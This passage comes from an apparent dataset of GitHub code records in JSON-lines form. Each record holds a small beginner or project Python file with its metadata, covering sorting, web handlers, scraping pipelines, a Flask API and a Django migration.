{totcéd} cédulas de R${céd}')\n if céd == 50:\n céd = 20\n elif céd == 20:\n céd = 10\n elif céd == 10:\n céd = 1\n totcéd = 0\n if tot == 0:\n break\nprint('='*30)\nprint('Volte Sempre!')\n\n\n","repo_name":"Leownhart/My_Course_of_python","sub_path":"Exercicios/ex071.py","file_name":"ex071.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"36679151659","text":"import math\n\ndef primenumbers(L):\n notprimes = set()\n primes = []\n for counter in range(2,L):\n if counter in notprimes: \n continue\n \n for j in range(counter*counter,L+1,counter):\n notprimes.add(j)\n \n primes.append(counter)\n return primes \n \npriem = primenumbers(1000000)\n\ndef dis(n,c):\n count = 0\n for p in priem:\n if n / p == int(n/p):\n count += 1\n if count == c:\n return True\n return False\n \ndef fourdis(n,x,c):\n count = 0\n for i in range(n,x+n):\n if(dis(i,c) == True):\n count += 1\n if(count == c):\n return True\n else:\n count = 0\n return False\nprint(fourdis(600,200,3))","repo_name":"CasperHagenaars/WISB256","sub_path":"Euler Challenge/Euler47.py","file_name":"Euler47.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73534811627","text":"import numpy as np\nimport cv2\nfrom tensorflow.keras.models import load_model\n\nimport os\nimport pandas as pd\nimport numpy as np\nimport tensorflow as tf\n\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\n\nmodel = load_model('vgg19_mydataset_240_320.h5')\n\nimage_gen = ImageDataGenerator()\ntrain_image_gen = image_gen.flow_from_directory('my_fruits_dataset',\n target_size=(240,320),\n color_mode='rgb',\n batch_size=32,\n class_mode='categorical')\n\ndef predict_image(my_image):\n my_image = cv2.cvtColor(my_image, cv2.COLOR_BGR2RGB)\n my_image = tf.image.resize_with_pad(my_image, 240, 320)\n my_image = np.array(my_image)\n my_image = my_image/255\n my_image = np.expand_dims(my_image, axis=0)\n result = model.predict_classes(my_image)\n\n class_names = train_image_gen.class_indices\n result_class = list(class_names.keys())[list(class_names.values()).index(result)]\n score = float(\"%0.2f\" % (max(model.predict(my_image)[0]) * 100))\n\n return result_class, score\n\ncap = cv2.VideoCapture(0)\n\nwhile(True):\n ret, frame = cap.read()\n cv2.imshow('frame',frame)\n\n k = cv2.waitKey(10)\n if k == 32:\n print(predict_image(frame))\n\n if k & 0xFF == ord('q'):\n break\n\ncap.release()\ncv2.destroyAllWindows()","repo_name":"kacperskoczek/fruit_recognition","sub_path":"mycamera.py","file_name":"mycamera.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"23304514600","text":"# import csv\n#\n# with open('data.csv', newline='') as f:\n# reader = csv.reader(f)\n# for row in reader:\n# print(row)\n\nimport pandas as pd\nimport os\n\n\ndef read_csv(file):\n df = pd.read_csv(file)\n var = df['no']\n for i in var:\n print(i)\n\n\ndef list_dir(my_dir):\n for file in os.listdir(my_dir):\n if file.endswith(\".csv\"):\n # print(os.path.join(\"/media/mrrobot/ACADEMIC/pycharm Projects/csv reader\", file))\n print(file)\n read_csv(file)\n\n\nif __name__ == \"__main__\":\n my_dir = \"/media/mrrobot/ACADEMIC/pycharm Projects/csv reader\"\n list_dir(my_dir)","repo_name":"sathishkumar95/assignment","sub_path":"myfiles/csv reader.py","file_name":"csv reader.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8655457798","text":"# how to call class methods using the class name or an instance of the class\n\nimport random\n\n\nclass Teacher:\n\n groups = [\"Group 1\", \"Group 2\", \"Group 3\", \"Group 4\"]\n # decorator\n\n @classmethod\n def sort(cls, name):\n print(name, \"is in\", random.choice(cls.groups))\n\n\n# calling a class method using class name\nTeacher.sort(\"Melvin\")\n\n\nteacher = Teacher()\n# calling a class method using an instance of our class\nteacher.sort(\"Eunice\")\nprint(teacher.groups)\n\n# The class acts as a container for the functionality tteacher we need.\n","repo_name":"MelvinMbae/class-attributes-methods-group3","sub_path":"grouping-classmethods.py","file_name":"grouping-classmethods.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33833013140","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Date : 2018-11-18\n# @Author : flying\n\nimport tornado.ioloop\nimport tornado.web\n\nclass MainHandler(tornado.web.RequestHandler):\n def get(self):\n print(111)\n u = self.get_argument('user')\n e = self.get_argument('email')\n p = self.get_argument('pwd')\n if u == 'flying' and e == 'flying@qq.com' and p == '1223':\n self.write(\"OK\")\n else:\n self.write(\"滚\")\n self.write(\"GET\")\n def post(self, *args, **kwargs):\n print(123)\n u = self.get_argument('user')\n e = self.get_argument('email')\n p = self.get_argument('pwd')\n if u == 'flying' and e == 'flying@qq.com' and p == '1223':\n self.write(\"OK\")\n else:\n self.write(\"滚\")\n self.write('POST')\n\napplication = tornado.web.Application([\n (r\"/index\",MainHandler)\n])\n\nif __name__ == \"__main__\":\n application.listen(8888)\n tornado.ioloop.IOLoop.instance().start()","repo_name":"flying1223/old_boy_git","sub_path":"old boy/day14/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13582174035","text":"from scipy.spatial import Voronoi, voronoi_plot_2d\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport time\n\nDIMENSION = 3\n\ndef init_index():\n index = [i + DIMENSION *\n j for j in range(DIMENSION) for i in range(DIMENSION)]\n return index\n\n\n# Punti utente scelti\nuser_points = np.array([(0, 0), (2,3)])\n\n# # Punti sulla griglia\nx_range = np.arange(0, 5)\ny_range = np.arange(0, 5)\ngrid_points = np.array([(x, y) for x in x_range for y in y_range])\n\n# starttime=time.time()\n# # Calcola le assegnazioni di Voronoi\n# vor = Voronoi(user_points)\n\n# # Trova il punto utente più vicino a ciascun punto sulla griglia\nassignments = []\nfor grid_point in grid_points:\n min_distance = float('inf')\n nearest_user_point = None\n for i, user_point in enumerate(user_points):\n distance = np.linalg.norm(grid_point - user_point)\n if distance < min_distance:\n min_distance = distance\n nearest_user_point = i\n assignments.append(nearest_user_point)\n\n# duration = time.time() - starttime\n# print(f\"Time: {duration} s\")\n# # Disegna le celle di Voronoi e i punti sulla griglia\n# voronoi_plot_2d(vor)\n# plt.scatter(grid_points[:, 0], grid_points[:, 1],\n# c=assignments, cmap='viridis', marker='.')\n# plt.scatter(user_points[:, 0], user_points[:, 1], c='red', marker='o')\n# plt.xlim(0, 127)\n# plt.ylim(0, 127)\n# plt.gca().set_aspect('equal', adjustable='box')\n# plt.show()\n\nprint(assignments)","repo_name":"FedericoCantarelli/bvclassificator","sub_path":"code/bvclustering/voronoi_prova.py","file_name":"voronoi_prova.py","file_ext":"py","file_size_in_byte":1450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73564368106","text":"# To be used with PyInstaller\n# Command line: pyinstaller pyinstaller_setup_dl_sdks_onefile.spec\na = Analysis(['dl_sdks_exe.py'],\n hiddenimports=['platform'],\n runtime_hooks=None)\n\n# Remove specific binaries\na.binaries = a.binaries - TOC([\n ('sqlite3.dll', '', ''),\n ('_hashlib', '', ''),\n ('_sqlite3', '', '')])\n \n# Remove clashing dependency duplicate \nfor d in a.datas:\n\tif 'pyconfig' in d[0]: \n\t\ta.datas.remove(d)\n\t\tbreak\n\t\t\t\t\npyz = PYZ(a.pure)\nexe = EXE(pyz,\n a.scripts,\n a.binaries,\n a.zipfiles,\n a.datas,\n name='download_sdks.exe',\n debug=False,\n strip=None,\n upx=True,\n console=True,\n)\n","repo_name":"HanetakaChou/CryEngine-5.2.3","sub_path":"Tools/sdk_dl_exe/pyinstaller_setup_dl_sdks_onefile.spec","file_name":"pyinstaller_setup_dl_sdks_onefile.spec","file_ext":"spec","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"40575320602","text":"fruits = ['apple', 'banana', 'pear']\n\nrandom_list = ['Kaykay', 24, ['watermelon', 'pawpaw'], fruits]\n\n# print(random_list)\n\n# print(fruits)\n\n# new_fruit = input(\"Put your new fruit: \")\n\n# fruits[0] = new_fruit\n\n# random_list[2][0] = input(\"Put your newest fruit: \")\n\n# print(random_list)\n\n# new_fruit = input(\"Your new fruit: \")\n\n# fruits.append(new_fruit)\n# fruits.append('cherry')\n\n\nfruits.insert(0, 'orange')\n\n# print(fruits)\n\nto_do_list = ['wash plates', 'learn python', 'read book']\n\n# print(to_do_list)\n\n\n# task = input(\"What is the task: \")\n# position = int(input(\"What position do you want it added: \"))\n\n# to_do_list.insert(position-1, task)\n\n# print(to_do_list)\n\n# to_do_list.pop(1)\n\n# to_do_list.remove(\"learn python\")\n\n# to_do_list.clear()\n\n# del to_do_list\n\n# print(to_do_list)\n\ndef sum_all(*numbers):\n\ttotal = 0\n\n\tfor i in numbers:\n\t\ttotal+=i\n\t\t\n\tprint(total)\n\n\nsum_all(1,2,3,4,5,6,7)","repo_name":"nodebe/ItechforBootcamp","sub_path":"python_list2.py","file_name":"python_list2.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28035097495","text":"####################################################################################\r\n# ######### PyPoll.py analyzes Colorado election results from a csv file to #######\r\n# ######### give the total votes, county-wise votes, candidate-wise votes #######\r\n# ######### and vote%, as well as the largest county turnout and the winner #######\r\n####################################################################################\r\n\r\n# Add dependencies\r\nimport csv\r\nimport os\r\n\r\n# Assign a variable to load a file from a path\r\nfile_to_load = os.path.join(\"Resources/election_results.csv\")\r\n\r\n# Assign a variable to save the file to a path\r\nfile_to_write = os.path.join(\"analysis\", \"election_analysis.txt\")\r\n\r\n#######################################################\r\n# Initialize variables, arrays & Dictionaries\r\n#######################################################\r\n\r\n# A total vote counter\r\ntotal_votes=0\r\n\r\n# Candidate options and candidate votes\r\ncandidate_names=[]\r\ncandidate_votes={}\r\n\r\n# County options and county votes\r\ncounty_names=[]\r\ncounty_votes={}\r\n\r\n# Track the winning candidate, vote count, and percentage\r\nwinning_name=\"\"\r\nwinning_votes=0\r\nwinning_percent=0\r\n\r\n# Track the winning county, and vote count\r\nwinning_county=\"\"\r\nwinning_county_votes=0\r\n\r\n#######################################################\r\n\r\n# Open the election results and read the file\r\n\r\nwith open(file_to_load,'r') as file_read:\r\n file_data=csv.reader(file_read)\r\n \r\n # Read and skip the header row\r\n headers=next(file_data)\r\n\r\n # Read each data row of the file\r\n for row in file_data:\r\n # Add to the total vote count\r\n total_votes += 1\r\n\r\n # Get the candidate and county name from each row\r\n candidate=row[2]\r\n county=row[1]\r\n\r\n # If the candidate does not match any existing candidate add it the\r\n # the candidate list\r\n if candidate not in candidate_names:\r\n # Add the candidate name to the candidate list\r\n candidate_names.append(candidate)\r\n # And begin tracking that candidate's voter count\r\n candidate_votes[candidate]=0\r\n \r\n # If the county does not match any existing county add it the\r\n # the county list\r\n if county not in county_names:\r\n # Add the county name to the county list\r\n county_names.append(county)\r\n # Begin tracking the county's voter count\r\n county_votes[county]=0\r\n \r\n # Add a vote to that candidate's and county's count\r\n candidate_votes[candidate]+=1\r\n county_votes[county]+=1\r\n\r\n# Create message to write/print to results file. Print Total Vote count\r\nmsg_to_prn=(\r\n f\"\\nElection Results\\n\"\r\n f\"-------------------------\\n\"\r\n f\"Total Votes: {total_votes:,}\\n\"\r\n f\"-------------------------\\n\\n\"\r\n f\"County Votes:\\n\"\r\n )\r\n\r\n# Retrieve vote count and percentage for each county\r\nfor cnt in county_votes:\r\n cvotes=county_votes[cnt]\r\n cpercent=(cvotes/total_votes)*100\r\n \r\n # Check if the county has the largest turnout\r\n if cvotes>winning_county_votes:\r\n winning_county_votes=cvotes\r\n winning_county=cnt\r\n # Print each county, their voter count, and percentage\r\n msg_to_prn+=(f\"{cnt}: {cpercent:.1f}% ({cvotes:,})\\n\")\r\n\r\n# Print the largest turnout county name\r\nmsg_to_prn += (f\"\\n-------------------------------------\\n\")\r\nmsg_to_prn += (f\"Largest County Turnout: {winning_county}\\n\")\r\nmsg_to_prn += (f\"-------------------------------------\\n\")\r\n\r\nfor c in candidate_votes:\r\n votes=candidate_votes[c]\r\n percent=(votes/total_votes)*100\r\n \r\n # Check if the candidate has the highest number and % of votes and is the winner\r\n if votes>winning_votes and percent>winning_percent:\r\n winning_votes=votes\r\n winning_percent=percent\r\n winning_name=c\r\n # Print each candidate, their voter count, and percentage\r\n msg_to_prn+=(f\"{c}: {percent:.1f}% ({votes:,})\\n\")\r\n\r\n# Print the winning candidates' results\r\nmsg_to_prn += (f\"-------------------------------------\\n\")\r\nmsg_to_prn += (f\"Winner: {winning_name}\\n\")\r\nmsg_to_prn += (f\"Winning Vote Count: {winning_votes:,}\\n\")\r\nmsg_to_prn += (f\"Winning Percentage: {winning_percent:.1f}%\\n\")\r\nmsg_to_prn += (f\"-------------------------------------\\n\")\r\n\r\n# Print results to the terminal\r\nprint(msg_to_prn)\r\n\r\n# Save the results in a text file\r\nwith open(file_to_write,'w') as results_file:\r\n results_file.write(msg_to_prn)\r\n\r\n########################### End of Code ######################################","repo_name":"ruchis2712/Election_Analysis","sub_path":"PyPoll.py","file_name":"PyPoll.py","file_ext":"py","file_size_in_byte":4595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22634849861","text":"class Solution:\n def replaceElements(self, arr: List[int]) -> List[int]:\n length = len(arr)\n max_val = arr[length-1]\n arr[length-1] = -1\n for i in range(length-2,-1,-1):\n temp = arr[i]\n arr[i]=max_val \n if max_val< temp:\n max_val=temp\n return arr","repo_name":"jealsab/Competitive-Programming","sub_path":"1299-replace-elements-with-greatest-element-on-right-side/1299-replace-elements-with-greatest-element-on-right-side.py","file_name":"1299-replace-elements-with-greatest-element-on-right-side.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"13950717581","text":"'''\ncomb_sort.py\n\nImproves on bubble sort by using a gap sequence to remove turtles.\n\n\nhttps://en.wikipedia.org/wiki/Comb_sort\n'''\n\ndef comb_sort(seq):\n '''\n :param seq: A list of integers\n :rtype: A list of integers\n '''\n\n gap = len(seq)\n swap = True\n\n while gap > 1 or swap:\n gap = max(1, int(gap / 1.25))\n swap = False\n for i in range(len(seq) - gap):\n #print(seq)\n if seq[i] > seq[i + gap]:\n seq[i], seq[i + gap] = seq[i + gap], seq[i]\n swap = True\n return seq\n\n\nif __name__ == '__main__':\n unordered_integers = [8, 15, 23, 42, 4, 16]\n ordered_integers = comb_sort(unordered_integers)\n print('comb_sort reuslt: {}'.format(ordered_integers))\n","repo_name":"garigari-kun/mynotes","sub_path":"src/algorithms/comb_sort.py","file_name":"comb_sort.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9967510840","text":"\"\"\"\n371. Sum of Two Integers\nGiven two integers a and b,\nreturn the sum of the two integers without using the operators + and -.\nExample 1:\nInput: a = 1, b = 2\nOutput: 3\nExample 2:\nInput: a = 2, b = 3\nOutput: 5\n\n\"\"\"\nclass Solution:\n def getSum(self, a: int, b: int) -> int:\n lst = []\n for i in range(a):\n lst.append(1)\n for j in range(b):\n lst.append(1)\n print(len(lst))\n# a = 1\n# b = 2\na = 2\nb = 3\ns1=Solution()\ns1.getSum(a,b)\n","repo_name":"SACHINKV14/MCS_00_Sachin_Core_Python","sub_path":"practice 04 Dec/harsha_tasks/_27_jan_2022/leetcode_371_Sum_of_Two_Integers.py","file_name":"leetcode_371_Sum_of_Two_Integers.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25135070301","text":"from django.contrib import admin\nfrom .models import Order,OrderItems\n# Register your models here.\n\nclass OrderAdmin(admin.ModelAdmin):\n model = Order\n\nclass ItemAdmin(admin.ModelAdmin):\n model = OrderItems\n\nadmin.site.register(Order,OrderAdmin)\nadmin.site.register(OrderItems,ItemAdmin)\n","repo_name":"hrharish111/FirstPizzaAppMoberries","sub_path":"orderApp/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34567867336","text":"from flask_restx import Namespace, fields\nfrom flask import request\nfrom prod.api.base_resource import BaseResource\nfrom prod.db_models.user_db_model import UserDBModel\nfrom prod.db_models.user_project_db_model import UserProjectDBModel\nfrom prod.db_models.transactions_db_model import TransactionsDBModel\nfrom prod.exceptions import BusinessError, InvalidTransitionAmount\nfrom prod.schemas.user_representation import user_representation\nfrom prod.exceptions import UserBlockedError, InvalidTransitionType\nfrom prod.schemas.user_repeated import user_repeated\nfrom prod.schemas.constants import MISSING_VALUES_ERROR, REPEATED_USER_ERROR\nfrom prod.schemas.constants import INVALID_TOKEN\n\nns = Namespace(\n name='transactions',\n description='All user transactions related operations'\n)\n\n\n@ns.route('')\nclass UsersTransactionListResource(BaseResource):\n\n REGISTER_FIELDS = (\"user_id\", \"project_id\", \"amount\", \"type\", \"token\")\n\n code_status = {\n UserBlockedError: (406, 'user_blocked')\n }\n\n body_swg = ns.model(user_representation.name, user_representation)\n\n code_20x_swg = ns.model('All transactions input 20x', {\n 'transaction_id': fields.Integer(description='The transaction id'),\n 'user_id': fields.Integer(description=('The user id associated with '\n 'the transaction')),\n 'projects_id': fields.Integer(description=('The project id associated '\n 'with the transaction')),\n 'amount': fields.Integer(description='The amount of the transaction'),\n 'type': fields.String(description='The type of the transaction')\n })\n\n code_400_swg = ns.model(user_repeated.name, user_repeated)\n\n code_409_swg = ns.model('UserOutput409', {\n 'status': fields.String(example=REPEATED_USER_ERROR)\n })\n\n @ns.response(200, 'Success', fields.List(fields.Nested(code_20x_swg)))\n def get(self):\n \"\"\"Get all transactions\"\"\"\n response_object =\\\n [user.serialize() for user in TransactionsDBModel.query.all()]\n return response_object, 200\n\n @ns.expect(body_swg)\n @ns.response(201, 'Success', code_20x_swg)\n @ns.response(400, MISSING_VALUES_ERROR, code_400_swg)\n @ns.response(409, 'User already exists', code_409_swg)\n def post(self):\n \"\"\"Create a new transaction\"\"\"\n\n try:\n data = request.get_json()\n missing_args = self.missing_values(data, self.REGISTER_FIELDS)\n if missing_args:\n ns.abort(400, status=MISSING_VALUES_ERROR,\n missing_args=missing_args)\n\n token_deco = UserDBModel.decode_auth_token(data['token'])\n if isinstance(token_deco, str) or data['user_id'] != token_deco:\n ns.abort(404, status=INVALID_TOKEN)\n owner_id = UserProjectDBModel.get_user_of_project_id(\n data['project_id'])\n if owner_id < 0:\n ns.abort(404, status='project not found')\n if owner_id == data['user_id'] and data['type'] == 'support':\n ns.abort(\n 401, status=('An Project Owner cannot support '\n 'his/her own project'))\n if owner_id != data['user_id'] and data['type'] == 'pay':\n ns.abort(\n 401, status='Only Project Owner can make Pay transactions')\n user_model = TransactionsDBModel.add_transaction(\n data['user_id'],\n data['project_id'],\n data['amount'],\n data['type'])\n\n response_object = user_model.serialize()\n return response_object, 201\n except InvalidTransitionAmount:\n ns.abort(403, status='Transaction amount must be bigger than 0')\n except InvalidTransitionType:\n ns.abort(403, status=('Transaction type must '\n 'be either support or pay'))\n except BusinessError as e:\n code, status = self.code_status[e.__class__]\n ns.abort(code, status=status)\n","repo_name":"Seedy-Fiuba-Grupo-5/Backend-users","sub_path":"backend_users/prod/api/transactions_api.py","file_name":"transactions_api.py","file_ext":"py","file_size_in_byte":4128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17785032659","text":"import random\n\n# Datos de Agumon\nagumon = {\"nombre\": \"Agumon\", \"vida\": 100, \"ataque\": 20}\n\n# Datos de Gabumon\ngabumon = {\"nombre\": \"Gabumon\", \"vida\": 100, \"ataque\": 18}\n\n\n# Función para simular un ataque\ndef ataque(atacante, defensor):\n dano = random.randint(15, 25)\n defensor[\"vida\"] -= dano\n if defensor[\"vida\"] < 0:\n defensor[\"vida\"] = 0\n print(\n f\"{atacante['nombre']} infligió {dano} puntos de daño a {defensor['nombre']} (Vida restante: {defensor['vida']}).\"\n )\n\n\n# Simulación del combate\nwhile agumon[\"vida\"] > 0 and gabumon[\"vida\"] > 0:\n # Turno de Agumon\n ataque(agumon, gabumon)\n if gabumon[\"vida\"] <= 0:\n print(\"¡Has derrotado a Gabumon! ¡Eres el vencedor!\")\n break\n\n # Turno de Gabumon\n ataque(gabumon, agumon)\n if agumon[\"vida\"] <= 0:\n print(\"¡Gabumon te ha derrotado! ¡Has perdido la batalla!\")\n break\n","repo_name":"KevinPlucci/LABO-1-Python","sub_path":"CLASES/CLASE 1/YO/BattlePets/battlePets_yo.py","file_name":"battlePets_yo.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"11619461197","text":"from odoo import models, fields, api\nfrom odoo.exceptions import ValidationError\nimport logging\n\nlogger = logging.getLogger(__name__)\n\nclass BookCategory(models.Model):\n _name = 'library.book.category'\n\n _parent_store = True\n _parent_name = 'parent_id'\n\n name = fields.Char('Category')\n book_id = fields.Many2one('library.book', 'Book', required=True)\n description = fields.Text('Description')\n parent_id = fields.Many2one('library.book.category',string='Parent Category',ondelete='restrict',index=True)\n child_ids = fields.One2many('library.book.category','parent_id',string='Child Category')\n parent_path = fields.Char(index=True)\n\n @api.constrains('parent_id')\n def _check_hierarchy(self):\n if not self._check_recursion():\n raise models.ValidationError('Error! You cannot create recursive categories.')\n\n def create_categories(self):\n categ1 = {'name' : 'Child Category 1','description' : 'Description for child 1'}\n categ2 = {'name' : 'Child Category 2','description' : 'Description for child 2'}\n parent_category_val = {\n 'name' : 'Parent Category',\n 'email': 'Description for parent category',\n 'child_ids': [\n (0,0,categ1),\n (0,0,categ2)\n ]\n }\n record = self.env['library.book.category'].create(parent_category_val)\n\n def create_multi_category(self):\n categ1 = {'name' : 'Category 1','description' : 'Description for Category 1'}\n categ2 = {'name' : 'Category 2','description' : 'Description for Category 2'}\n\n multiple_records=self.env['library.book.category'].create([categ1,categ2])\n\n# class LibraryBook(models.Model):\n# _inherit = \"library.book\"\n\n# @api.multi\n# def name_get(self):\n# result=[]\n# for book in self:\n# if not self.env.context.get('custom_search', False):\n# authors=book.author_ids.mapped('name')\n# name='{} ({})'.format(book.name,', '.join(authors))\n# result.append((book.id,name))\n# logger.info(\"------------------------Cate Name Get If----------------------------\")\n# else:\n# result.append((book.id,book.name))\n# logger.info(\"------------------------Cate Name Get Else----------------------------\")\n# return result\n\nclass LibraryBook(models.Model):\n _inherit = 'library.book'\n\n def name_get(self):\n logger.info(\"--------------Before Hook-------------------\")\n # do something before\n value = super(LibraryBook, self).name_get()\n # do something after\n logger.info(\"--------------After Hook-------------------\")\n logger.info(\"--------------Value Hook------------------- {}\".format(value))\n return value","repo_name":"PangSoramDepo/Odoo_All_In_One","sub_path":"my_library/models/library_book_categ.py","file_name":"library_book_categ.py","file_ext":"py","file_size_in_byte":2891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23626453735","text":"import socket\n\nIP='127.0.0.1'\nPORT=12345\n\n\ndef main():\n\t#creating a socket\n\tserverSocket=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n\tserverSocket.bind((IP,PORT))\n\t#making TCP Socket listen to 10 connections at time\n\tserverSocket.listen(10)\n\n\twhile True:\n\t\t#making socket accept from TCP Connection\n\n\t\tclient,address=serverSocket.accept()\n\t\tprint(f'The Client Connected is {address[0]} and on Port No. {address[1]}')\n\t\tbreak\nif __name__==\"__main__\":\n\tmain()\n","repo_name":"manu-karenite/network_lab","sub_path":"01_TCP_Connection/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11493628539","text":"import json\nfrom argparse import Namespace\n\n\ndef read_args(parser, args_dict):\n if args_dict is None:\n args = parser.parse_args()\n else:\n default_args_dict = get_argparse_defaults(parser)\n default_args_dict.update(args_dict)\n args = Namespace(**default_args_dict)\n\n # If we are training from a specific hyperparam set:\n if hasattr(args, 'from_config') and args.from_config:\n args = update_args_from_config(args)\n return args\n\n\ndef get_argparse_defaults(parser):\n \"\"\"Returns the default parameters of an argparser as a dict without the required arguments\n :type parser: argparse.ArgumentParser\n \"\"\"\n defaults = {}\n for action in parser._actions:\n if not action.required and action.dest != \"help\":\n defaults[action.dest] = action.default\n return defaults\n\n\ndef update_args_from_config(args):\n \"\"\"If we want to start a training using a specific set of hyperparameters.\n \"\"\"\n config = json.load(args.from_config)\n new_args = dict(args)\n new_args.update(config[\"args\"])\n return Namespace(**new_args)\n","repo_name":"adalab-ai/POD_prediction","sub_path":"src/utils/args.py","file_name":"args.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33641151735","text":"import string\n\ndef customs():\n with open('input6.txt') as f:\n\n file = [group for group in f.read().split('\\n\\n')]\n\n count = 0\n\n for line in file:\n groupPersons = line.split('\\n')\n allYes = set(string.ascii_lowercase)\n for person in groupPersons:\n personYes = set()\n for char in person:\n personYes.add(char)\n allYes = allYes & personYes\n count += len(allYes)\n return count\n\nprint(customs())\n","repo_name":"tiitinha/adventofcode","sub_path":"AoC20/day6/day6.py","file_name":"day6.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3905676383","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html\nfrom openpyxl import Workbook\nimport os\nimport csv\nfrom pymongo import MongoClient\n\n# class JianshuPipeline(object):\n# def __init__(self):\n# self.wb = Workbook()\n# self.ws = self.wb.active\n# self.ws.append(['作者', '关注', '粉丝', '文章', '字数', '简书钻', '个人介绍', '作者id', '���页url'])\n#\n# def process_item(self, item, spider):\n# line = [item['author'], item['concern'], item['fans'], item['article'], item['word_count'], item['js_diamond'], item['tag'], item['author_uid'], item['author_url']]\n# self.ws.append(line)\n# self.wb.save('jianshu.xlsx')\n# return item\n#\n# # def __init__(self):\n # store_file = os.path.dirname(__file__)+'/spiders/jianshu.csv'\n # headers = ['作者', '关注', '粉丝', '文章', '字数', '简书钻', '个人介绍', '作者id', '主页url']\n # self.file = open(store_file, 'w', encoding='utf-8')\n # self.writer = csv.DictWriter(self.file, headers)\n # self.writer.writeheader()\n #\n # def process_item(self, item, spider):\n # line = [item['author'], item['concern'], item['fans'], item['article'], item['word_count'], item['js_diamond'], item['tag'], item['author_uid'], item['author_url']]\n # self.writer.writerows(line)\n # #self.writer.writerows(line)\n # return item\n #\n # def close_spider(self,spider):\n # self.file.close()\n\nMongoDBname = 'jianshu' # 数据库名\nMongoItem = 'num' # 数据库集合名\n\nclass JianshuPipeline(object):\n def __init__(self):\n dbName = MongoDBname # 给数据库添加名字\n client = MongoClient() # 创建连接对象client\n db = client[dbName] # 使用的数据库\n self.post = db[MongoItem]\n\n def process_item(self, item, spider):\n item = dict(item)\n self.post.insert(item)\n return item","repo_name":"StormZO/jianshu","sub_path":"pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":2125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19726671973","text":"import os\n\nimport pkg_resources\n\n\ndef activate_egg(eggpath):\n \"\"\"Activate a Scrapy egg file. This is meant to be used from egg runners\n to activate a Scrapy egg file. Don't use it from other code as it may\n leave unwanted side effects.\n \"\"\"\n try:\n d = next(pkg_resources.find_distributions(eggpath))\n except StopIteration:\n raise ValueError(\"Unknown or corrupt egg\")\n d.activate()\n settings_module = d.get_entry_info('scrapy', 'settings').module_name\n os.environ.setdefault('SCRAPY_SETTINGS_MODULE', settings_module)\n","repo_name":"scrapy/scrapyd","sub_path":"scrapyd/eggutils.py","file_name":"eggutils.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":2733,"dataset":"github-code","pt":"37"} +{"seq_id":"15332583938","text":"import json\n\nfrom django.db import migrations\n\n\ndef get_json():\n try:\n with open('recipe/data/tags.json', encoding='utf-8') as file:\n initial_tags = json.load(file)\n return initial_tags\n except FileNotFoundError:\n print('Error')\n\n\ninitial_tags = get_json()\n\n\ndef add_tags(apps, schema_editor):\n Tag = apps.get_model(\"recipe\", \"Tag\")\n for tag in initial_tags:\n new_tag = Tag(**tag)\n new_tag.save()\n\n\ndef remove_tags(apps, schema_editor):\n Tag = apps.get_model(\"recipe\", \"Tag\")\n for tag in initial_tags:\n Tag.objects.get(slug=tag['slug']).delete()\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('recipe', '0002_initial'),\n ]\n\n operations = [\n migrations.RunPython(\n add_tags,\n remove_tags\n )\n 